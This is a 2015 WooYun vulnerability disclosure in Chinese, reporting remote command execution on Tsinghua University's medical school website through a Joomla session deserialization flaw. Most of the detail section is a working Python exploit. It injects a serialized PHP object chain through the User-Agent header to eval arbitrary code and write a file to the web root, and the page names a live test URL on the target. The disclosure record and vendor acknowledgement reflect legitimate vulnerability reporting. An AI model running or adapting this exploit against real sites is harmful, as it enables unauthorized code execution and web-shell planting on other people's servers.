当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161764

漏洞标题:清华大学医学院远程命令执行已GetShell

相关厂商:清华大学

漏洞作者: AK-47

提交时间:2015-12-16 12:40

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经确认,细节仅向厂商公开
2015-12-27: 细节向核心白帽子及相关领域专家公开
2016-01-06: 细节向普通白帽子公开
2016-01-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

session反序列化

详细说明:

漏洞原理就不说了,Joomla对象注入漏洞。下面直接给出EXP吧。。。

import urllib
import re
# !/usr/bin/python
# coding=utf-8
import urllib2
import cookielib, sys
site = sys.argv[1]
code = "file_put_contents($_SERVER['DOCUMENT_ROOT'].'/wooyun.php',base64_decode('PD9waHAgZWNobyAidGVzdHRlc3QiOz8+'))"
url = site + '?123=' + urllib.quote(
"@ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';" + code + ";echo '|<-';")
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)
ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:48:"eval($_REQUEST[123]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
try:
req = urllib2.Request(url=url, headers={'User-Agent': ua})
opener.open(req)
req = urllib2.Request(url=url)
res = opener.open(req).read()
resText = re.findall(r'\-\>\|(.*?)\|\<\-', res, re.DOTALL)
if resText:
print "KO"
else:
print "NO"
except:
print "HTTPError"

漏洞证明:

shell截图:

15.png


测试链接:http://www.med.tsinghua.edu.cn/wooyun.php

x5.png

修复方案:

你懂的

版权声明:转载请注明来源 AK-47@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-17 14:36

厂商回复:

谢谢提醒,我们会尽快修改的。

最新状态:

暂无